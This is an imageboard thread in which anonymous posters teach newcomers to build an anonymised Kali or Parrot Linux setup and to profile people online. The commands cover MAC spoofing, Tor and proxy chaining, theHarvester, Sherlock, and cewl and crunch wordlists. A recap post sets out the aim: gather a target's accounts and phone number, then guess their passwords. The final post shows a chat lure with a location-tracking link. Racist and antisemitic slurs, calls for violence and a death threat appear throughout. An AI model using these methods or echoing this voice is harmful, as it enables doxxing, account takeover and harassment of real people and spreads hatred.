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Rules Log Spot Those Who Glow Protect Yourself
Resign from your position at the FBI or your mother will die in her sleep tonight

File: f86d51edbad50c6⋯.png (196.11 KB, 445x494, 445:494, 8kunfiglet.png)

ffec39  No.13983[Last 50 Posts]

hello fellow anons

After a recent post where OP, just like me, was a beligerent faggot, another urgent matter

came to our attention here at AnonymousHQ. It seemed only one of the 364 IPs attached to the site was

actively performing OSINT to bring a dirty murderer to justice. This simply is not acceptable!

So if you have ever wanted to take part in the threads that get the heart pumping and rile up the

opposition, now is the time! We're here to teach you, from noob-faggot who has been lurking 739 days

to a full-blown investigator who could go out into the world and really shake things up!

We might even find some prodigies in the group who skip right to sunglasses and a hoodie in the dark

while they tap into the powergrid to fuel their maniacal tirades through the exciting lightning

tunnels of cyberspace!

Being as most of you faggots are using Windows, lets get over and download VMWare Player so we can get

an operating system on your machine that is worth a fuck!

VMWare Workstation:


Once you have downloaded and installed your workstation, the next post will entail how to upload a Kali Linux disk image to the Virtual Machine so we can make sure you don't get yourselves caught! Stay tuned and ask questions!

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000000  No.13985

>Using jewgle to find links to reddit, linkdin and facebook


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ffec39  No.13991


>tries to come off as 1337 when he doesn't even tails his tor connection

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ffec39  No.13997

File: 3b417578124a43c⋯.png (209.73 KB, 751x665, 751:665, vmware.png)


Do you know how stupid it is to funnel a tool that spiders through ~6k potential sockets into one VPN?

No, you don't.

Moving on…

Hello fellow anons!

We're back and it's time for the next step in the process of getting you

from sad weeb to flushing out the dirties of jews!

The first thing I need you to do is download a Kali Linux ISO Image, don't worry if you don't know what that is, just follow along!


Download the 64bit unless you know that you should be downnloading the 32bit image.

Now, go and open your VMWare Player. It should be in your Start Menu. (pic related)

click on "Open Virtual Machine"

find the .vmdk or vmx image that you downloaded from the Offensive Security website (let me know if you are having trouble finding the image)

Now for your settings, you are going to want to allocate at least 4gb of Ram minimum. If you don't know how much RAM you have, go here and find out


as far as processors, select 1. There is no difference in performance

from 1 up on VMWare Players for whatever reason. I don't know why exactly.

Make sure your network connection is set to Nat (if you are currently using a VPN) or Bridged if you are not.

click OK and make sure the minimum disk space is set to at least 30GB

You won't be storing anything on your Kali Box, so all you need is enough

room to install tools, so you could probably get away with 25GB but I wouldn't go less than that.

Once thats set, lets roll!

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ffec39  No.14001


>A fresh new LARP thread!

Checking those sick digits fellow anon!

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1f6cdd  No.14009


where'd you go?

fellow anon

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b7b7be  No.14031


I'm pretty tired and same-fagging around other posts is making me doomer.

First thing you faggots want to do when you open your VMWare Kali Box is install macchanger

just do this: alt-t

this will open a terminal window

you should see a blinking cursor

type the following:

sudo apt-get install macchanger -y

let it do it's thing and install.now, turn off the network connection (in the box) you'll be able to figure that out, it's really easy, then in the terminal window type this

macchanger eth0 down

macchanger -r eth0

macchanger eth0 up

do that shit. You might get some DNS resolution problems at this point, but that's an easy fix. Let me know if you do. If you want to get stupid and start hacking wifi shit right away, just type wifite into that terminal window after you have changed your mac ID with macchanger.

If you're having DNS problems, which you may, save a text file to your desktop with "nameserver" in it. Save the file as resolv.conf

then type locate resolve.conf in the terminal window and replace that document with the one you saved as resolv.conf

if you're having issues, ask.

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4a23cf  No.14037

(def xmy x z ( (*) x z)))

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0d12ff  No.14042

>Being as most of you faggots are using Windows,

lol not i sir

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4a23cf  No.14049


Go back to >>>/g/

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b7b7be  No.14053


are you samefaggin?

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b7b7be  No.14058


>find the .vmdk or vmx image

<OVA image

the pre-made installlation for VMWare come in .OVA

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b99a3a  No.14117


So I became haxx0r by installing linux?

And using virtual machines?

Being a haxx0r was never so easy.

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28dd9e  No.14120




God bless you for this effort. We need more of these posts around here.

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ae590a  No.14121


kek, no

I'm hoping we can at least get 10-20 guys who can script kitty theharvester, kingphisher and maybe a few other tools to conduct successful OSINT and fuck with the degenerate kikes who think they can just break any law they like because nobody is paying attention.

Things like PhoneInfoga require authcodes and are too much trouble to set up 10 different profiles to run. if we had a group of even 5 guys on the board here, we could be much more efficient. Maybe build everyone up to sharing a Maltego platform and start making sure criminals in high places get so lit up they won't throw a napkin out of a car without fearing we are watching them.

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ae590a  No.14125

File: 102b7613fac91b2⋯.png (183.58 KB, 922x532, 461:266, kali_red_draggon.png)


No problemo, anon! Thanks for the acknowledgement.

Alright, so we should have a working kali box, a super-secret MacID and…. Hmmm (don't pay any attention to this if you're noob-stat but I should have went with a ParrotOS box….) Ok

We need anonymity! how do we get that with Kali?

Ok, the follow these instructions VERY FUCKING SPECIFICALLY! Or, if you fuck everything up, just remove the Kali Linux VM and do that step over.

Alt-T opens your terminal

you now have a box and a blinking cursor on your screen

Looks like this #_


#_sudo apt-get update && apt upgrade -y

#_sudo apt-get install anonsurf

this will probably take from 10-15 minutes to run through. You just installled your machine, so there will be a shit ton of updates to make. Once its all done, do type

#_sudo apt-get update

and that will update the script to run from your gui (meaning now you can point and click just like a windows machine)

I think in Kali you have an applications menu, click that and look for AnonSurf it should be under the internet section/tab. Click it. When it promps you for things, just click yes. It will shut off any running program, so keep that in mind too.

Next I will bring you a few 100 IP's to port through at the click of a button! Yay!

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ae590a  No.14129

File: 3dca1d732eccbbd⋯.png (57.13 KB, 803x788, 803:788, settingsinfirefox.png)


shit almost forgot

once you have "AnonSurf Active, Dance Like Nobody's looking, Encrypt like Everyone Is!" on your screen, you're good. Nothing leaves your machine unless it's going through Tor

So now, open that terminal again




create a profile


Don't fuck around, here anons! You create a new profile every time you do any hinky shit! just trust me on this.

Ok, now in firefox, you want to add foxyproxy basic and then go to preferences

all the way down at the bottom, you will see Settings, open up

make it look like pic related, press OK

Boom, you're getting skinny boys! (that's a good thing)

Don't worry about foxyproxy just yet, you're good to surf the net anonymously. Only the NSA can track you and they don't a fuck about you NEETs

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b7b7be  No.14155


if anyone is having difficulty connecting or the connecting just spinning wheels on you, close your kali linux virtual box and go to the settings in the VMWare player for the kali box. Set your network connection to Bridged

depending on the windows version you have, it may need to be bridged when running Tor.

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996c97  No.14160


I'm already on Ubuntu, easiest way to install kali besides ubuntu? Don't wanna erase it, and since im not that good with linux overall, how to make sure I don't fuck up the dual boot stuff? Let's say after installation I have no option to dual boot, it goes straight to kali. Quick tip on that?

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487610  No.14161


install vmware in ubuntu

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a9473a  No.14166


>Extract the zip file as a folder on the desktop.

>Create new in workstation

>Navigate to that folder and choose the Kali vdmx file

>Boot up

>Use username "root", password is "toor" without quotes.

Just posting this for stuck anons.

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187604  No.14168

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b7b7be  No.14169

File: b8edc87d8f3b59f⋯.png (134.21 KB, 826x143, 826:143, this.png)

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b7b7be  No.14170

Thank You, brudya!

I haven't touched a windows box in a long time, so be sure to help me out if I miss anything.

Should I bring up proxychains and proxybroker now or you think it might be boogaloo overload?

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8efd3d  No.14196


Yes keep going

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b99a3a  No.14200

File: c6be335223dd8c3⋯.png (201.37 KB, 957x896, 957:896, proxybrokermenu.png)


you know what, I'm going to get a kali VB going because I don't know what requirements might be needed for proxybroker.


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ffec39  No.14257

I wrote this up right quick to pull, parse and disburse a list of proxies that can be uploaded to a scrip like ProxyChains.

first open the terminal and move to the desktop

#_mv ~/Desktop

git clone https://github.com/constverum/ProxyBroker.git

cd ./ProxyBroker

pip3 install ./requirements.txt (I think this is right, but not sure)

python3 proxybroker.py find –types SOCKS5 –limit 15 >/home/usr/Desktop/IP_stuff/proxylist.txt

grep -E -o "……..([0-9]{1,3}[\.]){3}[0-9]{1,3}:…." /home/usr/Desktop/IP_stuff/proxylist.txt >/home/usr/Desktop/IP_stuff/test.txt

sed -e 's/]/ /g' /home/usr/Desktop/IP_stuff/test.txt >/home/usr/Desktop/IP_stuff/test1.txt

sed -e 's/:/ /g' /home/tyler/Desktop/IP_stuff/test1.txt >/home/usr/Desktop/IP_stuff/test2.txt

ok, so after that you should have a file test2.txt on your desktop with 15 SOCKS5 proxies in it. Yay!

If anyone wants to clean this up and make it into an executable, that'd be cool. For everyone else, if you copy the taxt commands above and save them in a file on your desktop, you can just pull it up each time you need to renew your proxies.

If you just want a quick list of proxies, do this:

└──╼ $sudo su

[sudo] password for :

root@templeOS:/home/usr/Pictures/8kunHackCourse# proxybroker find –types SOCKS5 –limit 15

<Proxy US 0.10s [SOCKS5]>

<Proxy US 0.11s [SOCKS5]>

<Proxy US 0.11s [SOCKS5]>

<Proxy US 0.27s [SOCKS5]>

<Proxy US 0.29s [SOCKS5]>

<Proxy US 0.32s [SOCKS5]>

<Proxy SG 0.38s [SOCKS5]>

<Proxy US 0.39s [SOCKS5]>

<Proxy DE 0.47s [SOCKS5]>

<Proxy US 0.51s [SOCKS5]>

<Proxy US 0.13s [SOCKS5]>

<Proxy DE 0.66s [SOCKS5]>

<Proxy US 0.14s [SOCKS5]>

<Proxy US 0.15s [SOCKS5]>

<Proxy US 0.16s [SOCKS5]>

These are all public, btw. Same as me posting a list of websites. Nothing illegal or against the rules. We don't do those things.

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ffec39  No.14262






/newfags/ - don't fuck with the last part of this yet. You'll demoralize yourself thinking this was easy for us when we were new. It wasn't. Just stick with the above posts, get youself a Kali Linux VM going with AnonSurf, crack open your web browser and chill out until tomorrow.

I be tired n shit. Looking at my last post, I realized how alienating it must be to you guys. Just disregard the proxy shit for now.

we all gonna make it, anons!

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b7b7be  No.14534

File: 638048f35f0e6c1⋯.png (563.89 KB, 1209x672, 403:224, beginnersrecon.png)


Beginners Recon (easy stuff now that you have your kali box)

Crack open that VM Pndas! We got work to do.

We're keeping it easy today! Simple stuff, one of the scripts is already in your kali linux machine all you gotta do is change directories do your desktop and type out the following;

#_ cd ~/Desktop

#_ theharvester -d motleyjew.com -l 100 -b google -h ~/motelyjew.html

that -d means "domain follows" it's what we call a command and it takes arguments so, "I'm running theHarvester script, giving it domain command and feeding that command motleyjew.com argument" is what should be kind of going through your head as your typing so you have some sort of reference. The next command is -l, wanna take a guess? That's right, it's length! It usually follows suit but you'll get them over time, I just want you thinking about commands and arguments right now. Cool? Cool. next -f means file, so you're feeding the results here. This should leave a file named motleyjew.html on your desktop.

You can obviously play around with that as you wish. This recon is for url information as well as email information. Lets say you want to know who your girlfriend is surrounded by all day at work, theHarvester is the tool for you!


username Recon with Sherlock

cd ~/Desktop

-clone the repo

# git clone https://github.com/sherlock-project/sherlock.git

-change the working directory to sherlock

$ cd sherlock

–iinstall python3-pip

#_apt-get install python3-pip

# install the requirements

$ python3 -m pip install -r requirements.txt

#_To search for only one user:

python3 sherlock.py user123


python3 sherlock.py user1 user2 user3


Tune in, later on today I'm going to teach you guys how to find the name of someones secret Dog so you can feed their secret Dog when they are out of town. Neighborly duty sometimes requires this stuff.

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b7b7be  No.14537


this looks hard to make out:

theHarvester -d motleyjew.com -l 100 -b google -h ~/motelyjew.html

Make sure the H is the only capitalized letter or your it won't be recognized.

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710f75  No.14580


I like a bit of fun/sarcasm in posts, keeps them lively.

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7d82e3  No.14583

File: 95695213739b863⋯.webm (2.52 MB, 1280x720, 16:9, 8ch-erika.webm)

Bumping for interest. Keep going, faggot. I'm following along on ParrotOS.

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3ebcfd  No.14629

This looks interesting

Will take closer look during the weekend

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cf86e5  No.14639


Try VirtualBox

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63e5a3  No.14661


i know for a fact that kali lunix is strong OS for cracking passwords. Idk about untraceable parts. Also isnt it just more safe to build a cheap PC for kali alone?

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d69cdd  No.14697

File: 4695f9ba96ca410⋯.gif (1.54 MB, 480x264, 20:11, that really sizzles my sol….gif)


>came to our attention here at AnonymousHQ. It seemed only one of the 364 IPs attached to the site was actively performing OSINT to bring a dirty murderer to justice.

Now how would you go about parsing stats like that over at Langley Anonymous HQ?

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75128d  No.14710


lol what year is it

>u need Linux to be a 1337 anonymeme larper

no. plenty of skids like u use windows as well, just put a guy fawkes mask as ur wallpaper and install a matrix screensaver. operating system is irrelevant to someone who knows his way around a computer and he can accomplish all the same things regardless.

>kali linux

cringe. just install a regular distro and the software you need.


>Do you know how stupid it is to funnel a tool that spiders through ~6k potential sockets into one VPN?

>No, you don't.

This doesn't answer what he said or even mean anything, tthese are just random words to make you sound smart. jfc I hope I didn't have this much unwarranted hubris when I was 15.


Hey Cody, your wallpaper is fucking gay. Also use vim.

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b90171  No.14718

File: ab7bafa64cb0c12⋯.jpeg (58.6 KB, 511x305, 511:305, bump Shrek ON A LAPTOP ne….jpeg)


Sage negated.


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6c1471  No.14859

Dice rollRolled 5, 4 = 9 (2d6)


Thanks got stuck on the password.


I'm excited for more. keep it up anon.

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dae973  No.14875


if i havent been lurking for 739 days yet, is there any hope for me? or am i destined to be a nigger for the rest of my life?

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87a222  No.14885


When I do the anonsurf install this happens:

>root@kali:~# sudo apt-get install anonsurf

>Reading package lists… Done

>Building dependency tree

>Reading state information… Done

>E: Unable to locate package anonsurf

Any solution?

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87a222  No.14946

File: 16a37607a26003b⋯.jpg (22.53 KB, 385x385, 1:1, pepe_sysrze_400.jpg)

Anyone knows how to connect bluetooth and a wifi antenna to the vm?

I got to activate the bluetooth via the right corner button but my 2 test devices weren't found..?

Also can't find a wifi switch-on option.

I want to get access to my old password protected phone, may someone know which is the best way or tool to gain access back?

I can still activate bluetooth and wifi on the phone so I was hoping to get access to the files or better to reset the password.

Pls help. :/

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bf243c  No.14955

File: 21a273eae553d13⋯.png (379.69 KB, 1920x1200, 8:5, 1449455620220.png)

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89832e  No.14965









Keep doing this OP, please ignore the boomers, schizos, and shills.

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0153ea  No.15313

hello fren,

below you will find my best attempt at relaying the most important thing in the wheat tractor world wide interwebs to you.

being able to figure out your lost password for sites you logged in to and weren't smart enough to write it down! GURRRR I hate

when that happens\

lets talk about two very cool tools that Kali offers. the first of which is cewl. cewl will let you enter the domain of your facebook page, twitter page, any other pages where you have made a lot of posts pertaining to your personal life, like the names of your kids, wife, husband (faggot, there are not girs ont he internet), dog, mistress, favorite video game, book, author… you get the idea! cewl will let you get all that information on YOURSELF really quickly! yay! Below is how to make it work. It'll work if you work it, it won't if you don't!

cewl [arguments] domain

-d = depth

-m = min word len

-o = offsite links

-w = same as output / write to xxxxx.html or xxxxx.txt

-v = verbosity

-e = include emails

–email_file /home/emailfile.txt

proxy is a pain in the ass





default port is 8080, all others must be input manually

example command line interface command for cewl

cewl -d 3 -m 5 -v -e –email_file /home/faggot.txt -v -w /home/faggot.html https://www.cewlproject.com


what follows next is what to do with all those forgotten words so you can figure out that pesky password you lost!

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0153ea  No.15315

next lets talk about crunch

we really should spend many days on crunch. it is very very

really really

kind of important when you want to become cleet whacker in sportsball tournament.

crunch <min> <max> [charset]


pre-installed wordlists of general terms

#!_cd /home/desktop


crunch <from-len> <to-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt or START] [-t [FIXED]@@@@] [-s startblock]

#_crunch 8 10 abcdefg12345678 -o wordlist1.txt

Crunch will now generate the following amount of data: 12820477378560 bytes

12226560 MB

11940 GB

11 TB

-t = to define the pattern

-c = how many lines do we want

-s =the starting word

-d = how many duplicates are allowed

-f = Charset

-b = limit the size of the file

-o = output file

-l = escape meta characters and use in the pattern

-z = compress file

meta characters

@ = lowercase

, = uppercase

% = numbers

^ = symbols

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7df117  No.15327

File: fabf0b2d89e95c4⋯.png (39.25 KB, 686x499, 686:499, Screenshot at 2020-01-03 1….png)


now don't doomer.doomer(you) when you see this!

it's not meant to make sense! If it did, it wouldn't exist.

don't think you should know what that means either, becausse if you do, you don't need me!

crunch will take that information you gathered on YOURSELF from your social media pages and substitute things like characters in place of letters or numbers in place of letters or 2-4 random characters, numbers or letters, at the end of your forgotten password because you sometimes put shit like that on your password, dummy!

let me run a quick example of your favorite password 'nigger'

apologies, had to grab proxy for stupid captcha

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7df117  No.15334


do you see how much fun we're having now?

imagine, if you will, you find all the words relevant to yourself

and you make a list quick like this





you get the idea? In no time at all, you will have that lost

password and be able to log back into your reddit account! Yay!

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dbd287  No.15353


you're going to have to manually install it. I will walk you through.

git clone https://github.com/parrotsec/anonsurf.git

cd anonsurf

make .


I can't run through it myself on this machine because it may create conflicts with my current network setup but let me know how the above works for you. screenshots of any issues would be helpful. tnx

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dbd287  No.15360

File: 9e2b98552d7078b⋯.png (158.59 KB, 1269x940, 27:20, samsonite.png)

well look at this!

I went ahead and used my own twitter profile to show you how I would go about finding my lost reddit password.

pic related. What I will do next is figure out which words are suitable to reddits login standards. Is reddit alpha-numberic only? boy that would sure help! Lets find out!

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000000  No.15363

>2 days to write how to install unix and run scripts

This thread is hilarious

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8298e2  No.15381

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e25351  No.15385


well, that wasn't so bad!

I guess I couldn't remember it because I forgot I spoke German! Geschutzte

protected auf Enlisch

that was a really piss poor password for myself but I'm just like everyone else!

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b74b8b  No.15391

just a quick recap of what you should be able to do up to this point.

1. from identified targets username and/or email, search and find all identical instances on all top 100 social media sites.

2. from above list, search and find identifying information of target to include, hopefully, a phone number

3. Utilize phone number for a further in-depth look at targets social profile.

4. scan, skim and parse all words of targets social media accounts.

5. pull words from that skim, substitute characters as well as add characters, when necessary, to create a list of likely passwords that would be associated with that target.

6. have a coke and eat some tendies knowing that you probably have the password for some stupid person that uses social media to put their life out for everyone to see.

Like I said, I was able to figure mine out in roughly an hour. That's pretty quick! How did I run the password against the site hash? we will go over that tomorrow when we discuss the script pyrit in detail.

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b74b8b  No.15394


if it's not connecting, it won't connect to the VM Kali Box. It's weird about usb connections. why not use a direct connection from your computer? What tool are you wanting to use on Kali?

What kind of phone? Android or Iphone?

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d8f2cb  No.15395


Guys and OP : I left computers long time ago when Kali was still called BackTrack. But now that you give us everything on a plate, I can’t but comeback!

Thanks a lot!

Hope you will make many more of that. Maybe even a quick guide on copy paste with multiple levels after we did all that

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523e72  No.15403


>everything on a plate

there's literally books worth of literature on offensive-security.com website just for script kittys. Not having a day of any (((education))) I know how confusing it is, so I'm trying to lay out a simple path to being able to build a quick profile on someone online so we can get more and more anons involved in this. It's really our greatest threat against the (((power structure))). Most of us here wouldn't offer much by way of 1488killNiggg3rsRACEWARNOW! but we can get on a box and cause some havok in some shitbags life.

We have the power to do good things from this community, we really should be focusing on this instead of all the shit we cannot do like kill 100 million or more people looking for a good life for their family.

Everyone is entitled to live the way they want to live so long as it doesn't fuck with others, the second you do that, you get the rope. All of israel gets the rope, so there's plenty of real estate coming up.

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8292de  No.15412

I di like this idea, teaching autists too "hack" for maximum autistry! But I am question of Op's sexuality? He talk like gay ←

(sorry for bad English am Srb:)

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8292de  No.15416


every action done by other effects society either negatively or postively either through normalization or that action having "un-intended" consquences not to mention the well being mentally and pyshically of indiviuals in society effects us as a whole

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b7b7be  No.15431


perl necklace.pl >> asshole.fu

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b7b7be  No.15434


while the traditional concept of "truth" implies an external authority, "certainty" instead relies on the judgment of the individual.

Perhaps I'm just so NEET I stopped giving a fuck?

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b7b7be  No.15436


meant for


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18bc76  No.15444


I cant find the image

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8292de  No.15447


There are hard thruths that nature puts down that we can uncover through reason.

Such as; The strong should rule the weak.

Any society that ignores that law will unavoidably find it's death.

Just because it's from an outside source (Nature) does not mean it's wrong.

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97ba51  No.15448


use this https://parrotlinux.org/download-security.php

download the OVA image (Virtual Image)

when you go to start the virtual machine, "create new" and skip the part about attaching an image. Set your network to NAT and leave 30GB min for the install. 1 processor and at least 4GB RAM, 8 preferred if you have 16 or greater total.

ParrotOS has AnonSurf built into it, makes it much easier. It's also a much nicer general purpose OS with the same security tools as Kali plus a few others that make it a more pleasant environment overall.

or, offensive-security.com and find downloads and find the Kali .OVA image for download.

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b7b7be  No.15450


use this https://parrotlinux.org/download-security.php

download the OVA image (Virtual Image)

when you go to start the virtual machine, "create new" and skip the part about attaching an image. Set your network to NAT and leave 30GB min for the install. 1 processor and at least 4GB RAM, 8 preferred if you have 16 or greater total.

ParrotOS has AnonSurf built into it, makes it much easier. It's also a much nicer general purpose OS with the same security tools as Kali plus a few others that make it a more pleasant environment overall.

or, offensive-security.com and find downloads and find the Kali .OVA image for download.

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ae590a  No.15452


after you've done that, start and let it read "no image found" close out then move the .OVA to the newly created hard drive. Remove the virtual disk drive in settings, then save, then start the machine again.


for whatever reason, some systems don't virtualize well on removable storage. ParrotOS is one of those systems.

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000000  No.15511


Bump. Keep going OP, and ignore the salty demoralisation faggots. We need more of this to bring back some decent dig threads.

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e5b948  No.15524

File: 86292ddf45eb76f⋯.png (236.01 KB, 1920x1027, 1920:1027, howamithisdumb.png)


Hey thanks for this. Any idea what I am doing wrong here?

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6c24df  No.15530

File: 2d6b44fb8009b31⋯.pdf (6.89 MB, Black Hat Python.pdf)


alright, we'll move into some real lean python trying.

First, don't download any environments to work in. They're good if you know what you're doing, but IDE's make learning

python, especially for hack purposes, really difficult. just get a book, read a page, go back and scribe the page onto something extracting the key parts (note taking) and then actually apply the page to a text editor, save the file, run the file in your terminal. It will tell you where you messed up. That lag time between hitting the enter key and being able to fix it, then run it again, that lag time makes you REALLY not want to mess up so you tend to put care and effort into what you are doing which you want. An IDE only makes you change the code quick so you can hurry up and hit the run button again and see if that was the right fix.

just use gedit

1337 boys love to tell you how awesome they are because they can press cntrl-q but they're faggots, so who cares what they think?

onward with the fuckery!

#Variables simply point to data stored as the script-defined memory

Python determines the type of variable, user does not have to define them

#String, Integer, List, Boolean

String - "", upper(), lower(), replace(old,new), find()

#Integer - 1, 2, 3, etc..

Does not require '', "", (), []

#List - [1,2,3] (stores arrays of objects)

ablilty for: appending, inserting, removing, popping, indexing, counting, sorting, reversing

#Dictionaries - store lists and associated objects

[('ftp':21, 'ssh':22, 'smptp':25, 'https':80)]


'ftp', 'ssh', 'smtp', 'https'


21, 22, 25, 80







Believe it or not, that up there is kind of… sort of, everything you need to know about python in order to be efficient at penetrating

systems. Now, that's not to say you won't need to really really understand networking, but if you really know the above like the back of your hand and understand it like you would your native tongue, then you can be a real threat to systems. You could win bug-bounties knowing this alone as many bounties don't even require networking skills. You could make a living in the modern world if you just knew, inside and out, those 20 lines

my point to this long ass rant? Don't be scared, yo! It's not that bad if you think of python (Ruby, but not now… I'm just ADD as fuck!) as a tool and you put yourself in situations where you need a tool. Yeah, you're going to stare into your box for a long fucking time for a long fucking while, but then one day you're like, "Oh shit, there's an xxxx server, I wonder if port yyyyy is open?" then you don't even leave your terminal, throw a quick sweep script together in less time than it would have taken you to even locate one, sweep the box and fine out you can go ahead and SSH right to it. Then you're like, "oh man, I didn't even realize it but I didn't even need a script! cool.

We'll touch on if,else statements too, but they're more common sense than they are specific to Python.

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6c24df  No.15533


do me a favor and type this


if doesn't connect, you need to resolve your DNS host

are you running anonsurf?

if so, type

service tor start and see if it starts

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6c24df  No.15537


import socket

#the socket() module allows python to connect to networks.

import socket


S = socket.socket()


ans - s.recv(1024)

print ans

220 FreeFloat FTP Server (V1.1)

#first we give store socket (yet to be given an argument) to the variable S

#then we tell python to connect to IP at port 21

#then we tell python to collect the first 1024 bits of information (the head) to the variable a>

#then we print out the results

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6c24df  No.15538


> (the head) to the variable a>

*variable S

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6c24df  No.15539


jfc! sorry guys

the variable is ans

we're giving the results of the port scan to the variable ans

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6c24df  No.15542


on the bottom left of your screen you will see Menu

open that, next to the magnifying glass, search for theharvester

see if you find it in there.

you may just need to update your system

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6c24df  No.15543


>[('ftp':21, 'ssh':22, 'smptp':25, 'https':80)]

> services.keys()

> 'ftp', 'ssh', 'smtp', 'https'

> services.items()

> 21, 22, 25, 80

> services.has_key('ftp')

> True

> services.has_item(21)

> True

> services['ftp']

> 21

lets talk about the above real quick

if you notice we're just looking at the services stored int he array between the brackets up there.

when I type services (dot) something, I am asking list that I defined, ie: services, for a thing.

in the first request, I am asking services for the keys by saying services.keys()

now, if I just asked services.keys, python would be like "what the fuck, bro?" because I didn't ask python for anything

I didn't have my hands open, see?

if you want something from python, you have to ask with your hands open!


python "I don't know what you're saying tyler. fuck off"


python "here you go bro! all you had to do was ask!"


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ffec39  No.15544

File: 329edef1f4f292c⋯.jpeg (212.07 KB, 774x1032, 3:4, t.durd.jpeg)



there's no self-doxxin in the rule book so just pointing out that i'm not cody_1337, tyler_d, mr. prometheus, zigger, or any of the other pseudonyms that may find their way into the cut

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f7347d  No.15592

File: 87910b450a983fb⋯.jpg (113.11 KB, 846x781, 846:781, pol.jpg)

Bump for interest.

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5e994b  No.15721


Well, I already opened firefox at this point before configuring it.


So I could look at this page and Alt-Tab between terminal and browser.

I hope this did not fuck anything up.


>#_sudo apt-get update && apt upgrade -y

>#_sudo apt-get install anonsurf

asks me for if I should install dumpcap (for wireshark).

It says that enabling it might be a security risk so I am not sure what to do.

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ffec39  No.15725


enable it

you won't face any risk, that's only if you let other people use your computer, but even they wouldn't know what to do with wireshark

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981317  No.15774


can ping

anonsurf is running hmmm…

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ffec39  No.15775



create a profile

settings - above pic ( port 9050)


see what happens.

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981317  No.15776

Yeah I see it in there thats how I opened it the first time. Will look into updating later today when I have time.

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e2d6d9  No.15829


Considering I expect the Five Eyes intelligence agencies can track pretty much anyone on the internet regardless what kind of security measures they take, I doubt anyone will have 100% security.

However as a normfag with a little bit of privacy research I'll just give my two cents how to remain anonymous/secure from most threats out there.

Get yourself a private VPN. Have Tor installed. When installed go to about:config and disable a lot the junk like telemetry, WebGL, WebRTC, healthreport, geotracking, web beacon, any third party url links. Then install a few basic add-ons such as a browser agent spoofer & HTTPS Everywhere. You want to configure the browser agent spoofer (like Chameleon) to spoof a lot of data including: accept-encoding headers, GET requests, timezone data, screen size data, etc. Make sure Noscript is blocking most scripts too. If you are extra paranoid maybe get some VPN add-on and run it inside Tor to hide your Tor exit node. VPN > Tor > VPN > hello world

Use Bleachbit to wipe out the sqlite cookies/caches in Tor when you are done with every session.

Doing all of this should pretty much render any average tracking operation useless (unless you are some kind of targeted interest on the Five Eyes radar). And even then, I guess encrypting your harddrive may help. Doing all this should be good enough for an average activist or tin foil hat clown like myself. If you highly disagree that is OK, maybe provide me a reason or two why. Just my two cents.

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5e994b  No.15833

File: 178027aae77dfc4⋯.png (418.88 KB, 1296x681, 432:227, ClipboardImage.png)


Is this good?

I was going through this


as "sudo apt-get install anonsurf" didn't work on my computer either.

"make ." however returns "make: nothing to be done for '.'."

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0fa59f  No.15837


I knew OP was a skiddie as soon as I saw the green text ascii image. I thought the wanna be Neo's from the Matrix died out in the early 2000s.



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5e994b  No.15839

Using ./anonsurf start returns following

>[ i ] Starting anonymous mode:

> * Tor is not running! starting it for you

> * Stopping service nscd (already stopped)

> * Stopping service resolvconf (already stopped)

> * Stopping service dnsmasq (already stopped)

>Failed to start tor.service: Unit tor.service not found.

> * Saved iptables rules

> * Modified resolv.conf to use Tor and ParrotDNS/OpenNIC

> * Disabling IPv6 for security reasons

>net.ipv6.conf.all.disable_ipv6 = 1

>net.ipv6.conf.default.disable_ipv6 = 1

> * Configuring iptables rules to route all traffic through tor

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

> * Redirecting DNS traffic through tor

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

>* Allowing only tor to browse in clearnet

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

> * All traffic was redirected throught Tor

>[ i ] You are under AnonSurf tunnel

It says that "Failed to start tor.service: Unit tor.service not found." and also " All traffic was redirected throught Tor"

Quite confusing.

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ffec39  No.16107

File: f823ddf82d2703c⋯.png (12.97 KB, 615x51, 205:17, this.png)



this is what you're looking for

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c783a6  No.16135


Exactly, if i look for something i miraculously changes the fabric of reality. I think that would be called a delusion, an actual delusion not a preceived kibbuz shit shoveling one.

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fa8a93  No.16169


error: the following arguments are required: –types

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d6d9a8  No.16242


I think hacking random persons is a very bad idea. Some people are so reckless they lose their lifes doing that.

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d6d9a8  No.16243


I also might find your home, then i come visit you.

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d6d9a8  No.16247


I mean the guy that hacked the family home, i mean he might be so reckless that he would be involved in a deadly car accident.

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d6d9a8  No.16250


Given their cowardish nature, or let me better explain it as ignorance. The main problem is that law enforcement by the niggers that they are, are not really adjusted to give adequat punishment in that regard.

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d6d9a8  No.16252


But i m fairly certain that shit like "the password guesser" will not get off so lightly in the near future.

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a6d34a  No.16262






Does this guy not understand that we have IDs here?

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5e994b  No.16359

File: f1aa97257155e92⋯.png (125.54 KB, 1296x681, 432:227, ClipboardImage.png)


You mean this profile with email?

Also it looks like I got the anonsurf finally working with this


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208cc9  No.16363

File: b7280158207e2fb⋯.gif (212.74 KB, 232x377, 8:13, b72.gif)


Posting in a bread with no IP condom.

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208cc9  No.16383


>I doubt anyone will have 100% security.

Security is for faggots.

Real men fuck the system in the ass with no condom.

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788709  No.16395


>Also it looks like I got the anonsurf finally working with this

if it's working, then no need to change settings. Leave it be. the system will have an autoconfig for anonsurf.

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4f2f72  No.16410


this man knows.

basic privacy is this for me:

Use linux (Mint, Manjaro, Qubes OS, MX Linux)

Encrypt your entire harddrive with LUKS and a strong unique password

Configure to change your MAC address on every boot to a random address

Use a paid logless VPN and configure it well with a killswitch

Use the latest TOR with highest security settings

Never reveal personal info and use different nicknames/passwords/temporary emails everywhere

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32d418  No.17235



>replying to yourself

>doesn't understand lisp syntax

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24e26e  No.17793

YouTube embed. Click thumbnail to play.



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24220d  No.18229

File: e6708931de7f990⋯.png (64.03 KB, 233x302, 233:302, seeker_found.png)

Hi anon this is Shelly remember me?

No, where from?

I met you at Michelles about a month ago, sry I didnt get back snr I had a bf hehe no bf now wht r u doin?

oh hey not much, what did you have in mind? send me a pic i still dont rmember u

ok here comes...

see >>17787

wnna meet up tonight? I can send you a link for to nearme so you can find me. i'm gonna be at the stadium

yeah sounds great what time

aim for 9, heres the link https://15443cb433.com/nearme/ (see pic related)

/newfags/ when you see a dirty fucker like the thing claiming to have murdered 11 human beings, get us the information ASAP

